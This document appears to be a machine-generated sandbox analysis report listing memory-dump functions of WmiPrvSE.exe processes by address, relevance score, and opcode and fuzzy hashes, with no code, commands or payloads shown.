Source File: 0000000E.00000002.2091521660.00007FFD9BE70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ffd9be70000_WmiPrvSE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 54fb0725b5f947602c065c23928c5bceaacddafd7be41727e51dc70083d9d855
Instruction ID: f18bc9df6b41e4ae348742543b813b8441cdff881cf184a00d14cf941d705fd9
Opcode Fuzzy Hash: 54fb0725b5f947602c065c23928c5bceaacddafd7be41727e51dc70083d9d855
Instruction Fuzzy Hash: 3E012D31F0E60E5FE770A59844652BD36ADEF45384F630435E00FD72A2ED6AAD078352

Function 00007FFD9BE7D59E Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2091521660.00007FFD9BE70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ffd9be70000_WmiPrvSE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a459be4c1e23548f34d5f0c94f2ffc470da88fed03be7289cf13d5d0dbc46e05
Instruction ID: 959f102ff1818e3bad303be2ba11143477c9a5e04c81a3ae98afd8d9ecec6058
Opcode Fuzzy Hash: a459be4c1e23548f34d5f0c94f2ffc470da88fed03be7289cf13d5d0dbc46e05
Instruction Fuzzy Hash: B301683231954E4FEB15CB9CE4E43E93781EB95324F2509BED909C72E1D967E945C380

Function 00007FFD9BAB0C38 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2082128360.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ffd9bab0000_WmiPrvSE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bd10c26d76fe255a80d520464e893b1a70873cb1376ce6e7cc3e5ee5b31b0b86
Instruction ID: 0f432e3cce20d8d1cde7fb6983324e21e8d480ccf044f77144ca587c6339b21f
Opcode Fuzzy Hash: bd10c26d76fe255a80d520464e893b1a70873cb1376ce6e7cc3e5ee5b31b0b86
Instruction Fuzzy Hash: 82110231A0974C8FE322DBA4C8102DD7FB0EB42215F0641B3C084DB1A2D63416098B84

Function 00007FFD9BE77D9E Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2091521660.00007FFD9BE70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ffd9be70000_WmiPrvSE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 279ac731c9416b60b76cde4dc62a30c8b232f9eedf4e71837568b9c172864243
Instruction ID: e2c393f0d3b88733d9d3a59b80a011e495126216346f3872dd6f3003c3e61138
Opcode Fuzzy Hash: 279ac731c9416b60b76cde4dc62a30c8b232f9eedf4e71837568b9c172864243
Instruction Fuzzy Hash: 9001453131954A4FEB15CE9C94A87E83781DB96324F2409AEDA09C72E1D966A945C380

Function 00007FFD9BAB0C40 Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2082128360.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ffd9bab0000_WmiPrvSE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f72206452a95a8e6b628d75f7e239e27c2076e67ad9d80a865ffded75835dfc2
Instruction ID: cb9b3d73d22d5de49437f48696ed542de18eaced7eecda0de4ca43e5f9014560
Opcode Fuzzy Hash: f72206452a95a8e6b628d75f7e239e27c2076e67ad9d80a865ffded75835dfc2
Instruction Fuzzy Hash: 5F01C031A0A78C8FE712DBA4C8602DD7FB0EF52215F1641E7D095DB1A2DA3456498B85

Function 00007FFD9BE7BD3B Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2091521660.00007FFD9BE70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ffd9be70000_WmiPrvSE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67d20dfa2c8d8846cd4d983af8762da606e99930b9a4912e03926e9125c7ec35
Instruction ID: b630aea4e0395e2e7185472935b1e0aa6de52204799f556c4957152633dc59a2
Opcode Fuzzy Hash: 67d20dfa2c8d8846cd4d983af8762da606e99930b9a4912e03926e9125c7ec35
Instruction Fuzzy Hash: AA01FF3190894C8FDFE8EF58C8A4FD477B5EB98315F1401A9D50DE72A5DA319AC5CB40

Function 00007FFD9BE7BD3A Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2091521660.00007FFD9BE70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ffd9be70000_WmiPrvSE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 63775ef058683dc70b44e8bef6448aef850b4bd62b4ea3a2fb6257c4353d7545
Instruction ID: a0b405fca0ac0261a8a026209954c65ae50a2e81c502d3b6cda3197e8ef4c0de
Opcode Fuzzy Hash: 63775ef058683dc70b44e8bef6448aef850b4bd62b4ea3a2fb6257c4353d7545
Instruction Fuzzy Hash: 5201E83190894C8FDFA8EF58C8A8BD877B1EBA8315F1401A9D50DE72A5DA319AC5CB40

Function 00007FFD9BAB0C48 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2082128360.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ffd9bab0000_WmiPrvSE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 962054403d5c43b5c6f5d538d4e3ee67a967d04dfc5665f1bd899ee0e90a05b7
Instruction ID: 12be7b97e2cec861bd8511f5f70ea2aaa9c598a6852f8141c91ae595f4eb1db5
Opcode Fuzzy Hash: 962054403d5c43b5c6f5d538d4e3ee67a967d04dfc5665f1bd899ee0e90a05b7
Instruction Fuzzy Hash: 9001B131A0A38C8FD712DBB4C85019D7FB0EF02314F1641E7D055DB1A2DA345748CB81

Function 00007FFD9BE7BDB2 Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2091521660.00007FFD9BE70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ffd9be70000_WmiPrvSE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: da50da486cea6c677c614319d99af8f9e4a558a4f07b6e788451c3f3b92061bc
Instruction ID: 187ffd9502cd96b38ac10bde168097a7f511df29a108228ca17b02c7a3d0149f
Opcode Fuzzy Hash: da50da486cea6c677c614319d99af8f9e4a558a4f07b6e788451c3f3b92061bc
Instruction Fuzzy Hash: 76F0C23594F3CA9FE3129BB088718D53FB8EF43214B0A00F6D095C70A2CA6E5646C761

Function 00007FFD9BE765B2 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2091521660.00007FFD9BE70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ffd9be70000_WmiPrvSE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6f467627dc4ecab95f68c1617397cb4bee86fed54260727d6f61858559099fa7
Instruction ID: 299bf35a5803aea0362c82ca9340d3d9830c11ffa8a7f73c5b0f1aa126fb37e2
Opcode Fuzzy Hash: 6f467627dc4ecab95f68c1617397cb4bee86fed54260727d6f61858559099fa7
Instruction Fuzzy Hash: 0BF0623184F2CA9FD7128BB088A18D93FB8FF42214B1A45FAD045C70A2CA6E5646D751

Function 00007FFD9C20F03C Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2110906393.00007FFD9C200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ffd9c200000_WmiPrvSE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: edd65fc7354b171131fd21c5f92d88f651d430509ba24b8cc9a9dae6cbc88838
Instruction ID: c15b26b60620cb8ba80a1a63c2035fc2e85f6aafb5ce56294cd0ba8ea767b4f4
Opcode Fuzzy Hash: edd65fc7354b171131fd21c5f92d88f651d430509ba24b8cc9a9dae6cbc88838
Instruction Fuzzy Hash: 6C016074908A1D8FDFA8DF58D8A4BA8B7B2FB68300F10419AD04EE7250CB719A85CF00

Function 00007FFD9C202AF2 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2110906393.00007FFD9C200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ffd9c200000_WmiPrvSE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 90f7b188df9752123245d24322ce4850e60ae69f74e7bd634095c275365f4258
Instruction ID: 406d51a398de63355d4ab28b65f0f3f4eff7ce2baa795f6644fb31330dc75a31
Opcode Fuzzy Hash: 90f7b188df9752123245d24322ce4850e60ae69f74e7bd634095c275365f4258
Instruction Fuzzy Hash: A8F0623194E2C79FD322CFB088616A57FB4AF42244B1900F7D555871A3C56D1616C761

Function 00007FFD9BAB0C50 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2082128360.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ffd9bab0000_WmiPrvSE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3ab1a0e16326f10bb970d409765a0414dd72b8341f396e7805614117ed361f30
Instruction ID: d43885328248253f5271d47ba9b4e13c0f2f6d74205e599e1bc623a8cb5fe6ff
Opcode Fuzzy Hash: 3ab1a0e16326f10bb970d409765a0414dd72b8341f396e7805614117ed361f30
Instruction Fuzzy Hash: 6C018F30A0A3889FE712DBA4885459D7FB0AF12214F1541E7D455DB1A2DA385744CB41

Function 00007FFD9BAB28DA Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2082128360.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ffd9bab0000_WmiPrvSE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ab1a0aeada63eff822675f1fb3f0be98ba678f55b8b483208dd77a33d707ab83
Instruction ID: 1633817a5e003d2be31699eeb2c0c0bed7e40eb295a0a35f967208f10b78fed5
Opcode Fuzzy Hash: ab1a0aeada63eff822675f1fb3f0be98ba678f55b8b483208dd77a33d707ab83
Instruction Fuzzy Hash: F3F03130A0A62E8BEB74EBC4D8A47F87361EB95311F1141B6C45D931A5DE7C6A858F04

Function 00007FFD9C2037EA Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2110906393.00007FFD9C200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ffd9c200000_WmiPrvSE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 749cc4774f77edd35c4a7fa53ddd0e8cb0673d24ff2bac9774e90f014250d9a8
Instruction ID: 40da785c9d06b7a2e6e7b4cf85abd4677bb56d80ca98130ee7823610671b1eb1
Opcode Fuzzy Hash: 749cc4774f77edd35c4a7fa53ddd0e8cb0673d24ff2bac9774e90f014250d9a8
Instruction Fuzzy Hash: 34F0962160D2835FEB32CFA48CA52A43BF0FF07350B1946FAC4449B1D3C6687414D755

Function 00007FFD9BAB28B4 Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2082128360.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ffd9bab0000_WmiPrvSE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 26373a5ba78c4cbf62ce356db7f9142ee6a24895ed11e27c63496fce3033c082
Instruction ID: 4f06c4d0a8e46091ed7d59627597fb5dcf945332272bbc51062448420ff6fd60
Opcode Fuzzy Hash: 26373a5ba78c4cbf62ce356db7f9142ee6a24895ed11e27c63496fce3033c082
Instruction Fuzzy Hash: 0FF05430B0971E4AEB70EBC4D8A46B93351AF94311F1142B6C81DD31F6DD6CAA458E54

Function 00007FFD9C211686 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2110906393.00007FFD9C200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ffd9c200000_WmiPrvSE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c675346f652f0deabe126f517fe7bb52c44940d7daed05705e08d61ec19cc6e5
Instruction ID: cff6cbc83b888b6c5f1f2ae2f4eb6b146f9320c1c08087554294544a14937396
Opcode Fuzzy Hash: c675346f652f0deabe126f517fe7bb52c44940d7daed05705e08d61ec19cc6e5
Instruction Fuzzy Hash: CFF04230A0891D8FDFA9DB48C850FA9B7B1FB68340F1045DA800EE7290CB31AE84CF10

Function 00007FFD9C200738 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2110906393.00007FFD9C200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ffd9c200000_WmiPrvSE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a214b315d390d8aa0b9b61ad8f4ba22d3e3adde773e29d565fbb56be37ed2d88
Instruction ID: ab142f336df08f9d48ef0c864e024ebd2f54e9518ab4334cf38c8acfba560a3c
Opcode Fuzzy Hash: a214b315d390d8aa0b9b61ad8f4ba22d3e3adde773e29d565fbb56be37ed2d88
Instruction Fuzzy Hash: 5BD05E30B10D0D4B8B0CA62D885D570B3E1E7A92027D45369940AC6291ED25ECC58784

Function 00007FFD9BAB3BEF Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2082128360.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ffd9bab0000_WmiPrvSE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a2e1de2bc9f767eada2318e34130c345db0f39a689574f98f783f6e9fb99114e
Instruction ID: 321a6a846114a24c5886b74a1a5d792f0c8ecd29bbc7877aabcb91fe361b3210
Opcode Fuzzy Hash: a2e1de2bc9f767eada2318e34130c345db0f39a689574f98f783f6e9fb99114e
Instruction Fuzzy Hash: 64E06D20F0906A4BF7749790C8313BE62A2DF64300F020078D52E932E2DEB8AE414F04

Function 00007FFD9C201E8E Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2110906393.00007FFD9C200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ffd9c200000_WmiPrvSE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8f70f28106b0d4220dc38c86007dd6a69cbf845e74042b05e790f403f857bea8
Instruction ID: 8325d193c59fe7b2d40bb2efd16256d0d051e2422fbdacb061ea07ce2829902c
Opcode Fuzzy Hash: 8f70f28106b0d4220dc38c86007dd6a69cbf845e74042b05e790f403f857bea8
Instruction Fuzzy Hash: AED05E00F1C4474AF778D688043277871A2EF897A0F98017AE05EC62CBCC2978411542

Function 00007FFD9BE7CAA2 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2091521660.00007FFD9BE70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ffd9be70000_WmiPrvSE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 931c93d7e1f6a6e188e4e0d1867f87e431bf8653aef218bda90f0d59a95957e8
Instruction ID: 1f2cd3b3571526a7adb0ba8102f7bfee8ff658c30b4f3541f8cd635aabbc2775
Opcode Fuzzy Hash: 931c93d7e1f6a6e188e4e0d1867f87e431bf8653aef218bda90f0d59a95957e8
Instruction Fuzzy Hash: BFD01242F0E3CB4BE77ACAA408F50642F9CCF0724071B11B7D5464F3E3D9496A459351

Function 00007FFD9BAB0B9A Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2082128360.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ffd9bab0000_WmiPrvSE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ea49223fd1a816fd1b362e084a2150523c639c30c7cf8a22846f769d5ebcd9de
Instruction ID: 6752e1beee8305bdc7ed20ed28ddfdafce7b5adb2cdf0ac254f9518c7d2fa062
Opcode Fuzzy Hash: ea49223fd1a816fd1b362e084a2150523c639c30c7cf8a22846f769d5ebcd9de
Instruction Fuzzy Hash: 38D0123456680D8FC690E768DD95494BA90FB19214F9A01D1D40DC7161D3969995C701

Function 00007FFD9BAB5556 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2082128360.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ffd9bab0000_WmiPrvSE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3eac83e514a3680ad83f53afec195156fd419144b09bb3724988be85f8d06ed5
Instruction ID: 2f9c0191805cf85f1ab8fe2de28801a1c80999e71988c069b273f1583951f3cb
Opcode Fuzzy Hash: 3eac83e514a3680ad83f53afec195156fd419144b09bb3724988be85f8d06ed5
Instruction Fuzzy Hash: F9D0A701F1C4AA46E36B9354083197E14C70F84638F0801B8E02DD62DADC8C1B4106C7

Function 00007FFD9BAB06AD Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2082128360.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ffd9bab0000_WmiPrvSE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4e9260afcec124849f965bfa96b0f1ca91bab1fc0a8b233f756245c75d2df6c6
Instruction ID: be8a496b783f22204c327e42d3ce0ff7420acff2ea0dbf30ec0cacc556d89d7b
Opcode Fuzzy Hash: 4e9260afcec124849f965bfa96b0f1ca91bab1fc0a8b233f756245c75d2df6c6
Instruction Fuzzy Hash: A5C01200F0B62F00E43033AB14320ACA1008BC4A20FD30036D02C800A1A8ED2286094A

Function 00007FFD9C201E81 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2110906393.00007FFD9C200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ffd9c200000_WmiPrvSE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05628c564bdb825d3e97655699fdfe9d6fce3a35bddb3dead92039ede578188f
Instruction ID: 777f2c742f56a700d7edb9eb2127eab5e1b12daca21b72c8dadf89a1183d8852
Opcode Fuzzy Hash: 05628c564bdb825d3e97655699fdfe9d6fce3a35bddb3dead92039ede578188f
Instruction Fuzzy Hash: A9D0C931208806CFDAA4DA58C054E2833A1EB597803214065D10BC76A1EA24E841DB10

Function 00007FFD9C2042DB Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2110906393.00007FFD9C200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ffd9c200000_WmiPrvSE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b18ab0fae696d3c26a44ff0c70ac015a5948dc9da031c30084469e640823bf77
Instruction ID: 2b449d5b19c5057daaeb4d345a383bae96c5317ea82eb6515f0251a47c8d4216
Opcode Fuzzy Hash: b18ab0fae696d3c26a44ff0c70ac015a5948dc9da031c30084469e640823bf77
Instruction Fuzzy Hash: 8BD0C914B0D51789F679D6C2403033A35B55F10781E61813FC09F41BD1CE1DB5016621

Function 00007FFD9BE77D7B Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2091521660.00007FFD9BE70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ffd9be70000_WmiPrvSE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9ebdd21e8e551f126acfb6e59972b983eac48407ba40d3edc4c95dcc504d1389
Instruction ID: a87196c164499baac9426f123bac405e88da20c362ac6af738cb2ca00aa7c0d0
Opcode Fuzzy Hash: 9ebdd21e8e551f126acfb6e59972b983eac48407ba40d3edc4c95dcc504d1389
Instruction Fuzzy Hash: 74D09224B0F50F85F13C568181B0A3A61E9CF42300E26403DD29F838E1CD2A7B026A4A

Function 00007FFD9BE7D57B Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2091521660.00007FFD9BE70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ffd9be70000_WmiPrvSE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05f092ddd65427193150ed79bbbec3dab1ce8f5eb3647e37a21fcb98ab4d372b
Instruction ID: 7fbf703bd6e405c8fd4ede43093b1c36c7ef3925bd138d7bf8274e868b32a382
Opcode Fuzzy Hash: 05f092ddd65427193150ed79bbbec3dab1ce8f5eb3647e37a21fcb98ab4d372b
Instruction Fuzzy Hash: 48D09290F0F50FC6F1389AC580B023A2598DF44304E66913AD06F438E1CD2EBA016201

Function 00007FFD9BAB5301 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2082128360.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ffd9bab0000_WmiPrvSE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 21938eb0ae69bd5fba05d02f9ae5636ea614e5e192c3733e90a7025620b44f03
Instruction ID: 5e27b40d5798ba57ae5f1a281fd48eeff5fd229ba65433e12ac9934872835112
Opcode Fuzzy Hash: 21938eb0ae69bd5fba05d02f9ae5636ea614e5e192c3733e90a7025620b44f03
Instruction Fuzzy Hash: ADC02B00E1903D00F334477048302BE31005F11200F438172802E53081DD2816442E04

Function 00007FFD9BAB06D0 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2082128360.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ffd9bab0000_WmiPrvSE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8d151555a43ec30e371fdee9760290e5673c1d9f9f8c3533e043c54596d340e7
Instruction ID: 3cd97af5e79b130acf239512f905932c422ae69e61548627bc299b94b7c87604
Opcode Fuzzy Hash: 8d151555a43ec30e371fdee9760290e5673c1d9f9f8c3533e043c54596d340e7
Instruction Fuzzy Hash: 2DB01200E5741F00F43437FB0862078F0409B44100FC20070D41C80091A8DD16940646

Function 00007FFD9BE772C1 Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2091521660.00007FFD9BE70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ffd9be70000_WmiPrvSE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8eb7553029b7459d8c58029937b0f351018fbf2bbf0aac4bab1c8ed326bdf7fd
Instruction ID: dd1b14df857bb7e88133f5f59e6c6bfc32adabda30ed015934090c207d74b60e
Opcode Fuzzy Hash: 8eb7553029b7459d8c58029937b0f351018fbf2bbf0aac4bab1c8ed326bdf7fd
Instruction Fuzzy Hash: 4BB09200F0E20B83F53000E004E403C00C88B45200E620934A11A471E2EC4E2A001225

Non-executed Functions

Function 00007FFD9BAB09B0 Relevance: 5.2, Strings: 4, Instructions: 194COMMON

Download Yara Rule

Strings

"s9, xrefs: 00007FFD9BAB0B46
c9, xrefs: 00007FFD9BAB0B56
!k9, xrefs: 00007FFD9BAB0B4E
#{9, xrefs: 00007FFD9BAB0B3E

Memory Dump Source

Source File: 0000000E.00000002.2082128360.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ffd9bab0000_WmiPrvSE.jbxd

Similarity

API ID:
String ID: c9$!k9$"s9$#{9
API String ID: 0-1692736845
Opcode ID: ba6b00e57e933d4d72d66932d7df6b48ec220968cb7b3273c7f68de9773b6d28
Instruction ID: 139b4ecae3627bdfc639576cd1a295d21292f376d0265be54c24c6f8e48160a9
Opcode Fuzzy Hash: ba6b00e57e933d4d72d66932d7df6b48ec220968cb7b3273c7f68de9773b6d28
Instruction Fuzzy Hash: 63519E07B0957646E33973FD78219E95B849FA827FB0847BBE56E8D0C78C486081C3E9

Analysis Process: WmiPrvSE.exePID: 7744, Parent PID: 7644COMMON

Executed Functions

Function 00007FFD9BE80C95 Relevance: 2.1, Strings: 1, Instructions: 893COMMON

Download Yara Rule

Strings

d, xrefs: 00007FFD9BE81107

Memory Dump Source

Source File: 00000014.00000002.2162965956.00007FFD9BE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffd9be80000_WmiPrvSE.jbxd

Similarity

API ID:
String ID: d
API String ID: 0-2564639436
Opcode ID: f773965cd4293955a92de80bcba1c34dca3390a2653f84010d2cbb29f5aa4d5e
Instruction ID: ebcb1731e2e0b8fe5065d19d401209f4aedc4bcc8295b3b6b0381ac018d3c073
Opcode Fuzzy Hash: f773965cd4293955a92de80bcba1c34dca3390a2653f84010d2cbb29f5aa4d5e
Instruction Fuzzy Hash: 6B427531A0EF4A4FE769DB5888A15B137E0EF59314B1502BAD499CB1A7DD3AFC038781

Function 00007FFD9BE80E39 Relevance: 1.5, Strings: 1, Instructions: 299COMMON

Download Yara Rule

Strings

d, xrefs: 00007FFD9BE81107

Memory Dump Source

Source File: 00000014.00000002.2162965956.00007FFD9BE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffd9be80000_WmiPrvSE.jbxd

Similarity

API ID:
String ID: d
API String ID: 0-2564639436
Opcode ID: 5c01e34a34c980deac561bb330d0413cefd246338a85fbf91b321b8914230c91
Instruction ID: de0a6712b2c300cd208a07e1b9721dcadab096fed87c3b8912d1d1adc5c0bf26
Opcode Fuzzy Hash: 5c01e34a34c980deac561bb330d0413cefd246338a85fbf91b321b8914230c91
Instruction Fuzzy Hash: 6691C030B19E098BDB5CDF088491A7673E5FF98344B1045BDD45ACB2AADA36FD42CB81

Function 00007FFD9BE8E098 Relevance: 1.4, Strings: 1, Instructions: 158COMMON

Download Yara Rule

Strings

, xrefs: 00007FFD9BE8E112

Memory Dump Source

Source File: 00000014.00000002.2162965956.00007FFD9BE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffd9be80000_WmiPrvSE.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: c939cc9ed1791ad302d245f1750e4f429110d0053adcbb585508100c71dda78a
Instruction ID: a392270dd76409b4e3ad3635168f4eaa654cd0415662e02812588f396c437a4e
